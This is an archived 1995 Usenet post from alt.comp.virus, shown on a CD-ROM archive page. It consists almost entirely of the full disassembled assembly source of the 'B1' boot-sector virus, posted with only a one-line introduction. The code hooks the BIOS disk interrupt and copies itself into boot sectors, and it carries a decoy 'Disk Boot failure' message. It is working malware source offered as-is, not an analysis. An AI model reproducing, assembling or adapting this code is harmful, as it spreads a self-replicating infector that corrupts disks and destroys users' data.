home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / SOURCE.ZIP / B1.ASM / partbinary0 < prev   
Encoding:
Text File  |  1995-10-29  |  10.1 KB  |  349 lines
  1. Path: chaos.dac.neu.edu!usenet.eel.ufl.edu!news.bluesky.net!news.sprintlink.net!uunet!ankh.iia.org!danishm
  2. From: danishm@iia.org ()
  3. Newsgroups: alt.comp.virus
  4. Subject: B1
  5. Date: 5 Feb 1995 22:05:37 GMT
  6. Organization: International Internet Association.
  7. Lines: 330
  8. Message-ID: <3h3i3h$v4@ankh.iia.org>
  9. NNTP-Posting-Host: iia.org
  10. X-Newsreader: TIN [version 1.2 PL2]
  11.  
  12. Here is the B1 virus:
  13.  
  14.   
  15. PAGE  59,132
  16. ; Disassembled using sourcer  
  17. ;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
  18. ;[[                                                                      [[
  19. ;[[                             B1                                       [[
  20. ;[[                                                                      [[
  21. ;[[      Created:   8-Jan-95                                             [[
  22. ;[[      Version:                                                        [[
  23. ;[[      Code type: zero start                                           [[
  24. ;[[      Passes:    5          Analysis Options on: none                 [[
  25. ;[[                                                                      [[
  26. ;[[                                                                      [[
  27. ;[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
  28.   
  29. data_1e         equ     413h                    ; (0000:0413=7Fh)
  30. data_2e         equ     46Dh                    ; (0000:046D=17E1h)
  31. data_3e         equ     4Ch                     ; (0006:004C=0DAh)
  32.   
  33. seg_a           segment byte public
  34.         assume  cs:seg_a, ds:seg_a
  35.   
  36.   
  37.         org     0
  38.   
  39. virus           proc    far
  40.   
  41. start:
  42.         jmp     short loc_2             ; (0040)
  43.         db       90h, 00h, 4Dh, 4Dh, 49h, 00h
  44.         db       33h, 2Eh, 33h, 00h, 02h, 01h
  45.         db       01h, 00h, 02h,0E0h, 00h, 40h
  46.         db       0Bh,0F0h, 09h, 00h, 12h, 00h
  47.         db       02h, 00h
  48.         db      19 dup (0)
  49.         db       12h, 00h, 00h, 00h, 00h, 01h
  50.         db       00h,0FAh, 33h,0C0h, 8Eh,0D0h
  51.         db      0BCh, 00h, 7Ch, 16h, 07h
  52. loc_2:
  53.         push    cs
  54.         call    sub_1                   ; (00EF)
  55.         push    ax
  56.         shr     ax,1                    ; Shift w/zeros fill
  57.         dec     ah
  58.         jz      loc_3                   ; Jump if zero
  59.         jmp     loc_14                  ; (01BA)
  60. loc_3:
  61.         push    bx
  62.         push    cx
  63.         push    dx
  64.         push    es
  65.         push    si
  66.         push    di
  67.         push    ds
  68.         push    bp
  69.         mov     bp,sp
  70.         or      ch,ch                   ; Zero ?
  71.         jnz     loc_5                   ; Jump if not zero
  72.         shl     al,1                    ; Shift w/zeros fill
  73.         jc      loc_4                   ; Jump if carry Set
  74.         call    sub_6                   ; (0190)
  75.         call    sub_4                   ; (017B)
  76.         jc      loc_7                   ; Jump if carry Set
  77.         call    sub_2                   ; (0127)
  78.         jz      loc_4                   ; Jump if zero
  79.         call    sub_6                   ; (0190)
  80.         call    sub_3                   ; (013B)
  81.         jz      loc_5                   ; Jump if zero
  82.         inc     ah
  83.         call    sub_4                   ; (017B)
  84.         jc      loc_5                   ; Jump if carry Set
  85.         call    sub_5                   ; (0182)
  86.         call    sub_6                   ; (0190)
  87.         inc     ah
  88.         call    sub_4                   ; (017B)
  89. loc_4:
  90.         call    sub_7                   ; (019E)
  91.         or      ch,dh
  92.         dec     cx
  93.         jnz     loc_5                   ; Jump if not zero
  94.         call    sub_6                   ; (0190)
  95.         call    sub_4                   ; (017B)
  96.         jc      loc_7                   ; Jump if carry Set
  97.         call    sub_2                   ; (0127)
  98.         jnz     loc_5                   ; Jump if not zero
  99.         call    sub_7                   ; (019E)
  100.         call    sub_3                   ; (013B)
  101.         dec     byte ptr [bp+10h]
  102.         jz      loc_6                   ; Jump if zero
  103.         mov     al,1
  104.         call    sub_4                   ; (017B)
  105.         jc      loc_7                   ; Jump if carry Set
  106.         call    sub_7                   ; (019E)
  107.         add     bx,di
  108.         inc     cl
  109.         jmp     short loc_6             ; (00BA)
  110. loc_5:
  111.         call    sub_7                   ; (019E)
  112. loc_6:
  113.         call    sub_4                   ; (017B)
  114. loc_7:
  115.         pushf                           ; Push flags
  116.         pop     bx
  117.         mov     [bp+16h],bx
  118.         xchg    ax,[bp+10h]
  119.         shr     ah,1                    ; Shift w/zeros fill
  120.         jnc     loc_9                   ; Jump if carry=0
  121.         xor     ax,ax                   ; Zero register
  122.         mov     ds,ax
  123.         mov     ax,ds:data_2e           ; (0000:046D=17E1h)
  124.         and     ax,178Fh
  125.         jnz     loc_9                   ; Jump if not zero
  126.         call    sub_6                   ; (0190)
  127. loc_8:
  128.         push    ax
  129.         call    sub_4                   ; (017B)
  130.         xor     cx,0FFC0h
  131.         nop                             ;*ASM fixup - sign extn byte
  132.         shl     ax,1                    ; Shift w/zeros fill
  133.         pop     ax
  134.         jnc     loc_8                   ; Jump if carry=0
  135. loc_9:
  136.         pop     bp
  137.         pop     ds
  138.         pop     di
  139.         pop     si
  140.         pop     es
  141.         pop     dx
  142.         pop     cx
  143.         pop     bx
  144.         pop     ax
  145.         iret                            ; Interrupt return
  146.   
  147. virus           endp
  148.   
  149. ;__________________________________________________________________________
  150. ;                              SUBROUTINE
  151. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  152.   
  153. sub_1           proc    near
  154.         mov     bx,44h
  155.         mov     dx,80h
  156.         mov     si,data_1e              ; (0000:0413=7Fh)
  157.         xor     di,di                   ; Zero register
  158.         mov     ds,di
  159.         dec     word ptr [si]
  160.         lodsw                           ; String [si] to ax
  161.         pop     si
  162.         mov     cl,6
  163.         shl     ax,cl                   ; Shift w/zeros fill
  164.         mov     es,ax
  165.         sub     si,bx
  166.         push    si
  167.         push    ax
  168.         mov     ax,1AEh
  169.         push    ax
  170.         push    cs
  171.         push    si
  172.         push    cs
  173.         pop     ds
  174.         call    sub_5                   ; (0182)
  175.         mov     ds,cx
  176.         mov     si,data_3e              ; (0006:004C=0DAh)
  177.         mov     cl,2
  178.         rep     movsw                   ; Rep when cx >0 Mov [si] to es:[di]
  179.         mov     [si-4],bx
  180.         mov     [si-2],es
  181.         pop     bx
  182.         pop     es
  183.         retf                            ; Return far
  184. sub_1           endp
  185.   
  186.   
  187. ;__________________________________________________________________________
  188. ;                              SUBROUTINE
  189. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  190.   
  191. sub_2           proc    near
  192.         cld                             ; Clear direction
  193.         push    cs
  194.         pop     ds
  195.         xor     si,si                   ; Zero register
  196.         mov     di,bx
  197.         mov     cl,40h                  ; '@'
  198.         push    si
  199.         push    di
  200.         add     si,cx
  201.         add     di,cx
  202.         repe    cmpsb                   ; Rep zf=1+cx >0 Cmp [si] to es:[di]
  203.         pop     di
  204.         pop     si
  205.         retn
  206. sub_2           endp
  207.   
  208.   
  209. ;__________________________________________________________________________
  210. ;                              SUBROUTINE
  211. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  212.   
  213. sub_3           proc    near
  214.         push    ax
  215.         xor     dh,dh                   ; Zero register
  216.         test    dl,80h
  217.         jz      loc_10                  ; Jump if zero
  218.         mov     cx,11h
  219.         jmp     short loc_11            ; (0175)
  220. loc_10:
  221.         mov     ax,[di+11h]
  222.         mov     cl,4
  223.         shr     ax,cl                   ; Shift w/zeros fill
  224.         mov     cx,ax
  225.         mov     ax,[di+16h]
  226.         shl     ax,1                    ; Shift w/zeros fill
  227.         jc      loc_12                  ; Jump if carry Set
  228.         add     ax,cx
  229.         jc      loc_12                  ; Jump if carry Set
  230.         xor     cx,cx                   ; Zero register
  231.         cmp     ah,[di+18h]
  232.         jae     loc_12                  ; Jump if above or =
  233.         div     byte ptr [di+18h]       ; al,ah rem = ax/data
  234.         xchg    cl,ah
  235.         cmp     ah,[di+1Ah]
  236.         jae     loc_12                  ; Jump if above or =
  237.         div     byte ptr [di+1Ah]       ; al,ah rem = ax/data
  238.         mov     ch,al
  239.         mov     dh,ah
  240.         inc     cx
  241. loc_11:
  242.         pop     ax
  243.         retn
  244. loc_12:
  245.         xor     cx,cx                   ; Zero register
  246.         jmp     short loc_11            ; (0175)
  247. sub_3           endp
  248.   
  249.   
  250. ;__________________________________________________________________________
  251. ;                              SUBROUTINE
  252. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  253.   
  254. sub_4           proc    near
  255.         pushf                           ; Push flags
  256.         call    dword ptr cs:[1BCh]     ; (7379:01BC=0D79h)
  257.         retn
  258. sub_4           endp
  259.   
  260.   
  261. ;__________________________________________________________________________
  262. ;                              SUBROUTINE
  263. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  264.   
  265. sub_5           proc    near
  266.         cld                             ; Clear direction
  267.         movsw                           ; Mov [si] to es:[di]
  268.         mov     cx,17Ch
  269.         add     si,3Eh
  270.         add     di,3Eh
  271.         rep     movsb                   ; Rep when cx >0 Mov [si] to es:[di]
  272.         retn
  273. sub_5           endp
  274.   
  275.   
  276. ;__________________________________________________________________________
  277. ;                              SUBROUTINE
  278. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  279.   
  280. sub_6           proc    near
  281.         push    cs
  282.         mov     ax,200h
  283.         mov     bx,ax
  284.         xor     cx,cx                   ; Zero register
  285.         xor     dh,dh                   ; Zero register
  286.         inc     cx
  287.         inc     ax
  288.         pop     es
  289.         retn
  290. sub_6           endp
  291.   
  292.   
  293. ;__________________________________________________________________________
  294. ;                              SUBROUTINE
  295. ;\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
  296.   
  297. sub_7           proc    near
  298.         mov     ax,[bp+10h]
  299.         mov     bx,[bp+0Eh]
  300.         mov     cx,[bp+0Ch]
  301.         mov     dx,[bp+0Ah]
  302.         mov     es,[bp+8]
  303.         retn
  304. sub_7           endp
  305.   
  306.         db      41h                     ; Inc   cx   ?
  307. loc_13:
  308.         mov     ax,201h
  309.         int     13h                     ; Disk  dl=drive a  ah=func 02h
  310.                         ;  read sectors to memory es:bx
  311.         xor     dl,80h
  312.         jz      loc_13                  ; Jump if zero
  313.         retf                            ; Return far
  314. loc_14:
  315.         pop     ax
  316. ;*              jmp     far ptr loc_1           ;*(000A:0D79)
  317.         db      0EAh, 79h, 0Dh, 0Ah, 00h
  318.         db      0Dh, 0Ah, 'Disk Boot failure', 0Dh
  319.         db      0Ah, 0
  320.         db      'IBMBIO  COMIBMDOS  COM'
  321.         db      18 dup (0)
  322.         db       55h,0AAh
  323.   
  324. seg_a           ends
  325.   
  326.   
  327.   
  328.         end     start
  329.  
  330. ls virus.asm
  331.  
  332.  
  333.  
  334. ls virus.asm
  335.  
  336.  
  337.  
  338.  
  339.  
  340.  
  341.  
  342.  
  343. --
  344. Eric "Mad Dog" Kilby                                 maddog@ccs.neu.edu
  345. The Great Sporkeus Maximus                 ekilby@lynx.dac.neu.edu
  346. Student at the Northeatstern University College of Computer Science 
  347. "I Can't Believe It's Not Butter"
  348.  
  349.